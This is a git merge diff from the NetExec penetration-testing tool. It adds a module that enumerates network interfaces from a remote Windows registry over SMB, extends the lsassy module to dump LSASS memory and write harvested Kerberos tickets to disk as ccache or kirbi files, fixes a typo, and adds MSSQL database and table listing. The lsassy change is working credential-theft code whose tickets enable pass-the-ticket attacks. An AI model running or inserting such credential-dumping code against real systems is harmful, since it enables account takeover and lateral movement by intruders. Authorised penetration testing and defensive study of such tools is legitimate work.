Merge branch 'main' into rdp-exec

Author: NeffIsBack

.github/ISSUE_TEMPLATE/bug_report.md

@@ -1,5 +1,3 @@
-# ❗❗❗ Before filing this bug report, MAKE SURE you have already downloaded the newest version of NetExec from GitHub and installed it! Many issues have already been reported and fixed, _especially_ if you are running the native Kali version! Please delete this line before submitting your issue if you have done so.❗❗❗
-
 ---
 name: Bug report
 about: Create a report to help us improve
@@ -9,6 +7,8 @@ assignees: ''
 
 ---
 
+# ❗❗❗ Before filing this bug report, MAKE SURE you have already downloaded the newest version of NetExec from GitHub and installed it! Many issues have already been reported and fixed, _especially_ if you are running the native Kali version! Please delete this line before submitting your issue if you have done so.❗❗❗
+
 
 
 **Describe the bug**

nxc/modules/enum_interfaces.py

@@ -0,0 +1,93 @@
+#!/usr/bin/env python3
+
+import contextlib
+from impacket.examples.secretsdump import RemoteOperations
+from impacket.dcerpc.v5 import rrp
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+
+class NXCModule:
+    """
+    Retrieve the list of network interfaces info (Name, IP Address, Subnet Mask, Default Gateway) from remote Windows registry'
+    Formerly --interfaces parameter
+    Made by: @Sant0rryu, @NeffIsBack
+    """
+
+    name = "enum_interfaces"
+    description = "Retrieve the list of network interfaces info (Name, IP Address, Subnet Mask, Default Gateway) from remote Windows registry (formerly --interfaces)"
+    supported_protocols = ["smb"]
+    opsec_safe = False
+
+    def __init__(self):
+        self.context = None
+        self.module_options = {}
+
+    def options(self, context, module_options):
+        """No options available"""
+
+    def on_admin_login(self, context, connection):
+        """Execute network interface enumeration on authenticated SMB connection"""
+        self.context = context
+
+        try:
+            remoteOps = RemoteOperations(connection.conn, False)
+            remoteOps.enableRegistry()
+
+            if remoteOps._RemoteOperations__rrp:
+                reg_handle = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)["phKey"]
+                key_handle = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, reg_handle, "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces")["phkResult"]
+                sub_key_list = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, key_handle)["lpcSubKeys"]
+                sub_keys = [rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, key_handle, i)["lpNameOut"][:-1] for i in range(sub_key_list)]
+
+                context.log.highlight(f"{'-Name-':<11} | {'-IP Address-':<15} | {'-SubnetMask-':<15} | {'-Gateway-':<15} | -DHCP-")
+                for sub_key in sub_keys:
+                    interface = {}
+                    try:
+                        interface_key = f"SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{sub_key}"
+                        interface_handle = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, reg_handle, interface_key)["phkResult"]
+
+                        # Retrieve Interace Name
+                        interface_name_key = f"SYSTEM\\ControlSet001\\Control\\Network\\{{4D36E972-E325-11CE-BFC1-08002BE10318}}\\{sub_key}\\Connection"
+                        interface_name_handle = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, reg_handle, interface_name_key)["phkResult"]
+                        interface_name = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, interface_name_handle, "Name")[1].rstrip("\x00")
+                        interface["Name"] = str(interface_name)
+                        if "Kernel" in interface_name:
+                            continue
+
+                        # Retrieve DHCP
+                        try:
+                            dhcp_enabled = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, interface_handle, "EnableDHCP")[1]
+                        except DCERPCException:
+                            dhcp_enabled = False
+                        interface["DHCP"] = bool(dhcp_enabled)
+
+                        # Retrieve IPAddress
+                        try:
+                            ip_address = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, interface_handle, "DhcpIPAddress" if dhcp_enabled else "IPAddress")[1].rstrip("\x00").replace("\x00", ", ")
+                        except DCERPCException:
+                            ip_address = None
+                        interface["IPAddress"] = ip_address if ip_address else None
+
+                        # Retrieve SubnetMask
+                        try:
+                            subnetmask = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, interface_handle, "SubnetMask")[1].rstrip("\x00").replace("\x00", ", ")
+                        except DCERPCException:
+                            subnetmask = None
+                        interface["SubnetMask"] = subnetmask if subnetmask else None
+
+                        # Retrieve DefaultGateway
+                        try:
+                            default_gateway = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, interface_handle, "DhcpDefaultGateway")[1].rstrip("\x00").replace("\x00", ", ")
+                        except DCERPCException:
+                            default_gateway = None
+                        interface["DefaultGateway"] = default_gateway if default_gateway else None
+
+                        context.log.highlight(f"{interface['Name']:<11} | {interface['IPAddress']!s:<15} | {interface['SubnetMask']!s:<15} | {interface['DefaultGateway']!s:<15} | {interface['DHCP']}")
+
+                    except DCERPCException as e:
+                        context.log.info(f"Failed to retrieve the network interface info for {sub_key}: {e!s}")
+
+            with contextlib.suppress(Exception):
+                remoteOps.finish()
+        except DCERPCException as e:
+            context.log.error(f"Failed to connect to the target: {e!s}")

nxc/modules/lsassy.py

@@ -4,12 +4,17 @@
 #  https://beta.hackndo.com [FR]
 #  https://en.hackndo.com [EN]
 
+import os
+import sys
 from lsassy.dumper import Dumper
 from lsassy.impacketfile import ImpacketFile
 from lsassy.parser import Parser
 from lsassy.session import Session
 
+from impacket.krb5.ccache import CCache
+
 from nxc.helpers.bloodhound import add_user_bh
+from nxc.paths import NXC_PATH
 
 
 class NXCModule:
@@ -21,13 +26,33 @@ def __init__(self, context=None, module_options=None):
         self.context = context
         self.module_options = module_options
         self.method = None
+        self.dump_tickets = True
+        self.save_dir = os.path.join(NXC_PATH, "modules", "lsassy")
+        self.ticket_type = "ccache"
 
     def options(self, context, module_options):
-        """METHOD              Method to use to dump lsass.exe with lsassy"""
+        """
+        METHOD              Method to use to dump lsass.exe with lsassy
+        DUMP_TICKETS        If set, will dump Kerberos tickets (Default: True)
+        SAVE_DIR            Directory to save dumped tickets
+        SAVE_TYPE           Type of ticket to save, either 'kirbi' or 'ccache' (Default: 'ccache')
+        """
         self.method = "comsvcs"
         if "METHOD" in module_options:
             self.method = module_options["METHOD"]
 
+        if "DUMP_TICKETS" in module_options:
+            self.dump_tickets = module_options["DUMP_TICKETS"].lower() in ["true"]
+
+        if "SAVE_DIR" in module_options:
+            self.save_dir = module_options["SAVE_DIR"]
+
+        if "SAVE_TYPE" in module_options:
+            self.ticket_type = module_options["SAVE_TYPE"]
+            if self.ticket_type not in ["kirbi", "ccache"]:
+                context.log.error(f"Invalid SAVE_TYPE '{self.ticket_type}'. Supported types are 'kirbi' and 'ccache'.")
+                sys.exit(1)
+
     def on_admin_login(self, context, connection):
         host = connection.host
         domain_name = connection.domain
@@ -67,7 +92,6 @@ def on_admin_login(self, context, connection):
             context.log.fail("Unable to parse lsass dump")
             return False
         credentials, tickets, masterkeys = parsed
-
         file.close()
         context.log.debug("Closed dumper file")
         file_path = file.get_file_path()
@@ -84,6 +108,9 @@ def on_admin_login(self, context, connection):
         if credentials is None:
             credentials = []
 
+        if self.dump_tickets and tickets:
+            self.write_tickets(context, tickets, host)
+
         for cred in credentials:
             c = cred.get_object()
             context.log.debug(f"Cred: {c}")
@@ -116,6 +143,52 @@ def on_admin_login(self, context, connection):
         context.log.debug("Calling process_credentials")
         self.process_credentials(context, connection, credentials_output)
 
+    def write_tickets(self, context, tickets, host):
+        if not tickets:
+            context.log.display("No Kerberos tickets found")
+            return
+
+        if not os.path.exists(self.save_dir):
+            try:
+                os.makedirs(self.save_dir)
+                context.log.debug(f"Created directory: {self.save_dir} for saving tickets")
+            except Exception as e:
+                context.log.fail(f"Error creating directory {self.save_dir}: {e}")
+                return
+
+        ticket_count = 0
+        for ticket in tickets:
+            for filename in ticket.kirbi_data:
+                try:
+                    base_filename = filename.split(".kirbi")[0]
+                    timestamp = ticket.EndTime.strftime("%Y%m%d%H%M%S")
+                    kirbi_data = ticket.kirbi_data[filename]
+
+                    if self.ticket_type == "ccache":
+                        ccache = CCache()
+                        ccache.fromKRBCRED(kirbi_data.dump())
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.ccache"
+                        ticket_content = ccache.getData()
+                    else:
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.kirbi"
+                        ticket_content = kirbi_data.dump()
+
+                    ticket_path = os.path.join(self.save_dir, ticket_filename)
+
+                    with open(ticket_path, "wb") as f:
+                        f.write(ticket_content)
+
+                    ticket_count += 1
+                    context.log.debug(f"Saved ticket: {ticket_filename}")
+
+                except Exception as e:
+                    context.log.fail(f"Error writing ticket {filename}: {e}")
+
+        if ticket_count > 0:
+            context.log.highlight(f"Saved {ticket_count} Kerberos ticket(s) to {self.save_dir}")
+        else:
+            context.log.display("No tickets were saved")
+
     def process_credentials(self, context, connection, credentials):
         if len(credentials) == 0:
             context.log.display("No credentials found")

nxc/modules/whoami.py

@@ -102,7 +102,7 @@ def on_login(self, context, connection):
 
             # Process Bad Password Count
             if "badPwdCount" in response:
-                context.log.highlight(f"Bad Passwod Count: {response['badPwdCount']}")
+                context.log.highlight(f"Bad Password Count: {response['badPwdCount']}")
 
             # Process servicePrincipalName
             if "servicePrincipalName" in response:

nxc/protocols/mssql.py

@@ -435,3 +435,74 @@ def rid_brute(self, max_rid=None):
 
             so_far += simultaneous
         return entries
+
+    def _qname(self, ident: str) -> str:
+        if ident is None:
+            return "[]"
+        return "[" + str(ident).replace("]", "]]") + "]"
+
+    def list_databases(self):
+        try:
+            q = (
+                "SELECT d.name AS DatabaseName, "
+                "       suser_sname(d.owner_sid) AS Owner "
+                "FROM sys.databases d "
+                "ORDER BY d.name;"
+            )
+            rows = self.conn.sql_query(q) or []
+            if not rows:
+                self.logger.display("No databases returned")
+                return
+
+            self.logger.display("Enumerated databases")
+            self.logger.highlight(f"{'Database Name':<30} {'Owner':<25}")
+            self.logger.highlight(f"{'-' * 30} {'-' * 25}")
+            for r in rows:
+                self.logger.highlight(f"{r.get('DatabaseName', ''):<30} {r.get('Owner', ''):<25}")
+            self.logger.highlight(f"Total: {len(rows)} database(s)")
+        except Exception as e:
+            self.logger.fail(f"Failed to enumerate databases: {e}")
+            self.logger.debug("list_databases error", exc_info=True)
+
+    def database(self):
+        db_arg = self.args.database
+
+        # nxc --database (no value) -> list
+        if db_arg is True or db_arg is None:
+            self.list_databases()
+            return
+
+        # nxc --database <name> -> tables
+        if isinstance(db_arg, str):
+            try:
+                safe = db_arg.replace("'", "''")
+                exists = self.conn.sql_query(f"SELECT 1 FROM sys.databases WHERE name = N'{safe}';")
+                if not exists:
+                    self.logger.fail(f"Database [{db_arg}] does not exist on the server.")
+                    return
+
+                tq = (
+                    f"SELECT t.name AS TableName, t.modify_date "
+                    f"FROM {self._qname(db_arg)}.sys.tables t "
+                    f"ORDER BY t.name;"
+                )
+                rows = self.conn.sql_query(tq) or []
+            except Exception as e:
+                self.logger.fail(f"Insufficient permissions or query error in [{db_arg}]: {e}")
+                self.logger.debug("database() error", exc_info=True)
+                return
+
+            if not rows:
+                self.logger.display(f"Database [{db_arg}] has no user tables.")
+                return
+
+            self.logger.display(f"Tables in database: {db_arg}")
+            self.logger.highlight(f"{'Table Name':<50} {'Last Modified':<25}")
+            self.logger.highlight(f"{'-' * 50} {'-' * 25}")
+            for r in rows:
+                mod = r.get("modify_date", "")
+                if mod and hasattr(mod, "strftime"):
+                    mod = mod.strftime("%Y-%m-%d %H:%M:%S")
+                self.logger.highlight(f"{r.get('TableName', ''):<50} {mod!s:<25}")
+            self.logger.highlight(f"Total: {len(rows)} table(s)")
+            return

nxc/protocols/mssql/proto_args.py

@@ -6,7 +6,8 @@ def proto_args(parser, parents):
     mssql_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[], help="NTLM hash(es) or file(s) containing NTLM hashes")
     mssql_parser.add_argument("--port", default=1433, type=int, metavar="PORT", help="MSSQL port")
     mssql_parser.add_argument("--mssql-timeout", help="SQL server connection timeout", type=int, default=5)
-    mssql_parser.add_argument("-q", "--query", dest="mssql_query", metavar="QUERY", type=str, help="execute the specified query against the MSSQL DB")
+    mssql_parser.add_argument("-q", "--query", dest="mssql_query", metavar="QUERY", type=str, help="execute the specified query against the mssql db")
+    mssql_parser.add_argument("--database", nargs="?", const=True, metavar="NAME", help="list databases or list tables for NAME")
 
     dgroup = mssql_parser.add_mutually_exclusive_group()
     dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain name")